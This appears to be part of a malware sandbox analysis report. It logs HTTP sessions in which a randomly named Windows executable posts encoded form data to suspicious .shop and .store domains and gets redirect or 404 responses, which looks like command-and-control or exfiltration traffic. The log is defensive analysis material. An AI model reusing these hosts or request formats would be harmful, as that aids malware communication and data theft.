65 49 74 58 54 38 74 72 33 58 49 52 70 30 3d Data Ascii: MdEl=H9BKEd4/JbdCQeVL+1PUM/zq9umQxAZFGbN5VpKJSsmvAmuQd1Xbl4+NFMumcAPtKa3DQBImzSaFWWgZBm0BJvROE8RttaS/7uArvcKoKKAN6e86KDpbLbrw8/x39+aVjAwtUhbABjVDTYcogeXZz0xkLxHVmxC3aDq+hBgLu+JdMbyQAoV2hzrgSxggeAeLdqQsGE6zHeItXT8tr3XIRp0=
Jul 8, 2024 07:21:40.060755968 CEST	841	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 08 Jul 2024 05:21:39 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 08 Jul 2024 06:21:39 GMT Location: https://www.evoolihubs.shop/fwdd/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9tKJdhRd69AEOxZdZuaNVn4nu2xzySuUSrgYAHbMfVGVdNXXqHsOUwz7OZDut849gyMLoAxpg5QV7n3FdYTnIwRynH7Q4agZN2p1xIlkqOrLCVOYhmFk541tB1STYPLYWpLGvuDB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 89fda1d09df74303-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49768	188.114.96.3	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:42.071683884 CEST	10819	OUT	POST /fwdd/ HTTP/1.1 Host: www.evoolihubs.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.evoolihubs.shop Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.evoolihubs.shop/fwdd/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 48 39 42 4b 45 64 34 2f 4a 62 64 43 51 65 56 4c 2b 31 50 55 4d 2f 7a 71 39 75 6d 51 78 41 5a 46 47 62 4e 35 56 70 4b 4a 53 73 65 76 44 51 61 51 64 55 58 62 6d 34 2b 4e 65 4d 75 6e 63 41 4f 78 4b 61 76 66 51 42 45 59 7a 55 57 46 58 31 34 5a 41 53 6f 42 41 76 52 4f 47 38 52 6f 77 4b 54 33 37 75 77 76 76 59 75 6f 4b 4b 41 4e 36 66 4d 36 4e 53 70 62 4a 62 72 7a 37 2f 78 37 72 4f 61 35 6a 44 41 58 55 68 66 51 42 53 31 44 54 34 73 6f 68 74 2f 5a 77 55 78 6d 49 78 48 33 6d 78 2b 53 61 43 47 59 68 41 46 6b 75 35 4a 64 50 4d 48 74 46 4c 5a 4f 77 69 2f 64 44 43 38 72 65 48 2b 38 59 61 34 6a 57 56 47 55 5a 2b 51 48 52 79 64 54 33 6c 48 45 44 64 55 31 33 5a 2f 72 4f 64 4b 73 74 63 76 78 51 32 31 5a 2f 41 73 4e 6c 61 67 56 76 32 70 55 49 32 77 31 77 6c 4a 45 2b 6b 72 65 78 48 4c 6e 47 30 54 41 38 39 49 47 44 79 32 36 51 4f 45 76 4f 50 65 33 39 53 48 49 6b 6b 4b 51 78 66 32 63 34 37 45 79 68 59 4f 79 47 43 4e 73 43 6f 49 41 41 42 2b 76 4d 4b 38 7a 33 4d 4f 45 71 49 70 71 2f 75 54 55 44 63 38 51 4d [TRUNCATED] Data Ascii: MdEl=H9BKEd4/JbdCQeVL+1PUM/zq9umQxAZFGbN5VpKJSsevDQaQdUXbm4+NeMuncAOxKavfQBEYzUWFX14ZASoBAvROG8RowKT37uwvvYuoKKAN6fM6NSpbJbrz7/x7rOa5jDAXUhfQBS1DT4soht/ZwUxmIxH3mx+SaCGYhAFku5JdPMHtFLZOwi/dDC8reH+8Ya4jWVGUZ+QHRydT3lHEDdU13Z/rOdKstcvxQ21Z/AsNlagVv2pUI2w1wlJE+krexHLnG0TA89IGDy26QOEvOPe39SHIkkKQxf2c47EyhYOyGCNsCoIAAB+vMK8z3MOEqIpq/uTUDc8QMkB8822xtvsEiCYHHqYOhmlGRXqRPnOfI06LCdOxrl7Y1rS+b9GLw8DLhVjoYF8An5P8xatcA3xi2VvxeA+ywdxYlbVB4D9+K6teqJKukFhyKwbophTW0iaVRwN01syczk+OvpMszmUodwnI3fRGJhmvpUPijYPigzl1BRdHNv6jW+guWZwBVYuBOEDJOsMaU0wVrhH0/A/S8/poDqCyxY4nFuNeEWJQvYlaj7rsyzX/FC3yvkIRzIrSfYyc0u/a9RoFXtuZqhAkzRdpQhi2xpdfkSQkIFlQYOVUv13QWdsACIWjv6nHhdHCdP7zipmuNy7C7JWXTTrhFCgxGlpjVH8niy6SePfabxE6bNPZ0pPAJKgqBWCqsgXEI4ofLa2E+7kB2+77/4zRu+cSQkPRwRqHgOufavEvRi/BvIOjoW5HocTJ/oYaKBhQx/tiOhxhFbeHOUT+H4ZOMAwRTP5xTCsMSGLpcsX7Y+72RUfZEF6V4PIhyNluYIebBSeRg8ns8hjqtCylF1fUgFUT7o98rDEXC+iLGuM5Onmo/9jZ/dA6FGuPQKGLlgcQd2sP1Hv+HvOLvmqHCOnXU1ESTpHsSx0cJkZpz/1n3upVnX+AbylqOqAm+Ow/5YnByQTRLgfS/486sw4mAx2EuoIOuH8g32ci9RSyOyEE8An [TRUNCATED]
Jul 8, 2024 07:21:42.527961016 CEST	851	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 08 Jul 2024 05:21:42 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 08 Jul 2024 06:21:42 GMT Location: https://www.evoolihubs.shop/fwdd/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TxYl8ehYSDAnhNi7c6RZgZTIz8XH36%2FSOOFb4kb68Rjp9qgOoNglwEBE0Q%2FhPUfr63wS8N0UHcAPh2zBz6lOnaRjR7%2FMUtwPT0VfnmyY%2BT092bAQ5T%2BkFoEx1OKnOtK5J4unjPu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 89fda1e078444277-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49769	188.114.96.3	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:44.616017103 CEST	453	OUT	GET /fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.evoolihubs.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:21:45.100048065 CEST	978	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 08 Jul 2024 05:21:45 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 08 Jul 2024 06:21:45 GMT Location: https://www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OS%2BVR6fmKNysuxwD%2FBzPTLkrjdy6DEuyLmMVaqCPBDDfySBuOj3rDLX1RKZJRfU48iKEx%2B4mk%2F9WTbRMb6foQgWnY7bCXY%2FRw5Xpo6A6mtYGkOLXx5th3UV6m%2F9RLN63lz7TTxIv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89fda1f078b48c4e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49770	45.130.41.38	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:50.252672911 CEST	729	OUT	POST /8rqd/ HTTP/1.1 Host: www.shaf-kupe-msk.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.shaf-kupe-msk.store Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.shaf-kupe-msk.store/8rqd/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 46 45 45 69 6f 77 61 54 69 67 39 71 2b 69 4e 56 32 5a 73 39 55 64 38 39 48 30 61 78 58 65 52 69 7a 7a 74 4d 46 33 6c 74 44 41 55 68 62 75 73 32 59 63 33 70 2b 36 6d 7a 59 34 6f 54 63 6f 46 6b 6a 6d 50 66 6c 64 48 72 77 30 71 77 69 55 2f 66 78 43 53 46 7a 42 65 43 4e 75 4a 52 2f 63 6d 48 7a 72 52 34 37 32 6b 62 36 48 42 52 62 66 4a 6e 79 33 45 37 44 31 69 50 6b 72 36 73 5a 30 70 72 70 79 6d 57 71 52 4d 50 69 52 33 6d 7a 31 55 48 4e 2b 6b 54 6a 4e 43 6f 6b 65 36 64 4f 4e 41 4a 45 64 6d 6f 42 32 52 79 44 67 52 45 77 54 4f 4b 7a 6a 45 6e 51 3d 3d Data Ascii: MdEl=wqxfxJ72E5VZZFEEiowaTig9q+iNV2Zs9Ud89H0axXeRizztMF3ltDAUhbus2Yc3p+6mzY4oTcoFkjmPfldHrw0qwiU/fxCSFzBeCNuJR/cmHzrR472kb6HBRbfJny3E7D1iPkr6sZ0prpymWqRMPiR3mz1UHN+kTjNCoke6dONAJEdmoB2RyDgREwTOKzjEnQ==
Jul 8, 2024 07:21:50.976327896 CEST	483	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 08 Jul 2024 05:21:50 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]\|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ\|.CAc`%E0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49771	45.130.41.38	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:52.784356117 CEST	749	OUT	POST /8rqd/ HTTP/1.1 Host: www.shaf-kupe-msk.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.shaf-kupe-msk.store Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.shaf-kupe-msk.store/8rqd/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 67 4d 45 67 49 4d 61 53 43 67 2b 6c 65 69 4e 62 57 5a 6f 39 55 52 38 39 43 4d 77 77 68 6d 52 68 57 50 74 65 55 33 6c 71 44 41 55 31 4c 76 6e 34 34 64 37 70 2b 32 66 7a 61 38 6f 54 63 55 46 6b 68 75 50 66 55 64 45 72 67 30 30 34 43 55 75 41 42 43 53 46 7a 42 65 43 4e 71 77 52 38 73 6d 47 47 6a 52 33 36 32 6e 46 71 48 43 59 37 66 4a 6a 79 32 44 37 44 31 55 50 6c 33 63 73 61 4d 70 72 70 43 6d 58 37 52 50 45 69 52 39 6f 54 31 43 4a 74 7a 62 56 78 51 30 32 6c 61 44 63 65 56 73 49 43 4d 38 35 77 58 47 67 44 45 69 5a 33 61 36 48 77 65 4e 38 55 73 4e 68 68 6f 6b 38 72 4c 78 69 43 52 42 55 57 76 30 6c 50 4d 3d Data Ascii: MdEl=wqxfxJ72E5VZZgMEgIMaSCg+leiNbWZo9UR89CMwwhmRhWPteU3lqDAU1Lvn44d7p+2fza8oTcUFkhuPfUdErg004CUuABCSFzBeCNqwR8smGGjR362nFqHCY7fJjy2D7D1UPl3csaMprpCmX7RPEiR9oT1CJtzbVxQ02laDceVsICM85wXGgDEiZ3a6HweN8UsNhhok8rLxiCRBUWv0lPM=
Jul 8, 2024 07:21:53.510607004 CEST	483	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 08 Jul 2024 05:21:53 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]\|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ\|.CAc`%E0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49772	45.130.41.38	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:55.317665100 CEST	10831	OUT	POST /8rqd/ HTTP/1.1 Host: www.shaf-kupe-msk.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.shaf-kupe-msk.store Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.shaf-kupe-msk.store/8rqd/ User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 4d 64 45 6c 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 67 4d 45 67 49 4d 61 53 43 67 2b 6c 65 69 4e 62 57 5a 6f 39 55 52 38 39 43 4d 77 77 68 75 52 68 6a 44 74 4d 6e 76 6c 72 44 41 55 32 4c 75 67 34 34 63 68 70 36 62 58 7a 61 67 53 54 5a 59 46 6b 44 57 50 4f 78 39 45 79 51 30 30 30 69 56 70 66 78 43 44 46 7a 78 61 43 4e 61 77 52 38 73 6d 47 48 54 52 2b 4c 32 6e 43 61 48 42 52 62 65 62 6e 79 32 6e 37 44 74 71 50 6c 7a 71 73 71 73 70 72 4a 53 6d 62 74 74 50 4a 69 52 7a 6c 7a 30 42 4a 74 2f 36 56 78 63 43 32 6c 75 6c 63 63 4a 73 4a 69 49 69 71 43 62 39 31 51 63 64 4f 33 66 5a 4c 48 76 42 6c 6b 41 59 6f 7a 39 6b 2f 2b 72 4b 75 77 5a 4e 41 48 37 75 35 61 74 56 4e 44 54 6e 77 7a 66 49 74 74 2f 6b 2f 6e 69 71 42 64 61 61 79 4e 63 4c 70 44 32 64 56 31 69 71 31 2f 2f 76 78 58 68 64 73 6c 6c 4a 66 4c 74 59 6a 65 52 6b 44 76 69 38 35 4a 55 4b 47 53 50 6e 59 4d 30 2b 76 31 63 55 66 6a 72 6d 51 4a 50 64 56 53 56 4f 44 73 44 46 79 50 2f 66 67 63 56 66 41 44 61 42 67 39 37 76 6c 36 6a 6c 6c 6e 37 71 55 62 6d 58 61 [TRUNCATED] Data Ascii: MdEl=wqxfxJ72E5VZZgMEgIMaSCg+leiNbWZo9UR89CMwwhuRhjDtMnvlrDAU2Lug44chp6bXzagSTZYFkDWPOx9EyQ000iVpfxCDFzxaCNawR8smGHTR+L2nCaHBRbebny2n7DtqPlzqsqsprJSmbttPJiRzlz0BJt/6VxcC2lulccJsJiIiqCb91QcdO3fZLHvBlkAYoz9k/+rKuwZNAH7u5atVNDTnwzfItt/k/niqBdaayNcLpD2dV1iq1//vxXhdsllJfLtYjeRkDvi85JUKGSPnYM0+v1cUfjrmQJPdVSVODsDFyP/fgcVfADaBg97vl6jlln7qUbmXa85/rXEIctvmQHdvXSRZhi8Z7GR3Lyp2NcQ5gMglz5DuVdveA1vN4ip9J6DvkbNdN4oAHT19AD/1PMKqVs7e8dMz/kHysTmzWvOtuu7cMzBuwJrWzPDsz7ACPMhR6CvZsr6ECKlxLpL/A9Da/e1EZW6oqiqAUBFnGt2mq+2sinkTFlLWubY5tMDqXCvUTGf4hsSTMW37H5oK6X8zSLj4IDcN5rAiTMmEMypZvgRcUq2fjAkz9+tYSW7juUocCPIcRYMtGbmv9rRq3g6mLWwKkydZTSkhdmAU2JoNsx1MlgpzScp5iPdaxJHB9xfCgqmuP1VDDMSBbNO4p1cwrwTCsv1dCfR4QEj3X546eGxosLBVd7NxKmAxXbpIbeM+Y8sJAoZCnsBxY7siZ1OJ7VTJYjbnevlY5Lf5DT7JZzHwL4n0JMQG0vbKbjTi7JVq1q9pQ2wgiq+AwnF+JTxcafNmABclO2qMOeEBh7NEtBxEmjirro+2lIAEDqe6T3dyf6XL8Bt9PohTsKIR2zgZjNqlA6/MXHQXOCDtx1ejogUzlqZJXKot4PJdhapPhsq2VLe20ENEyImIrA/mdK1blCZq/Zy/pt409Ucf2FAWh0DWnCVk8tSq8oUZy0lsa23j3dHTaiItLHrvvuku5yqNmiqTNdJ6ghlrrYi4Zig [TRUNCATED]
Jul 8, 2024 07:21:56.169691086 CEST	483	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 08 Jul 2024 05:21:56 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]\|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ\|.CAc`%E0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49773	45.130.41.38	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
Jul 8, 2024 07:21:58.047709942 CEST	457	OUT	GET /8rqd/?MdEl=9oZ/y9WNG6tRMVJzvrFJclhZlNWoKEVAmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1ryApRwhJgDSSPIk5FA+fYO+UYOCGL962fYpg=&cv4D=Bv0xSH88iTF48zS0 HTTP/1.1 Host: www.shaf-kupe-msk.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Jul 8, 2024 07:21:58.753254890 CEST	486	IN	HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Mon, 08 Jul 2024 05:21:58 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 283 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 61 66 2d 6b 75 70 65 2d 6d 73 6b 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.shaf-kupe-msk.store Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49774	3.33.130.190	80	4584	C:\Program Files (x86)\tVlZmxSoVuuTzQSYOHWiqGdCFqCdblJSzaTwsRvHLUpGXFPotQhcHZvmHLkRIfNX\PIrlNRZFMoz.exe

Timestamp	Bytes transferred	Direction	Data
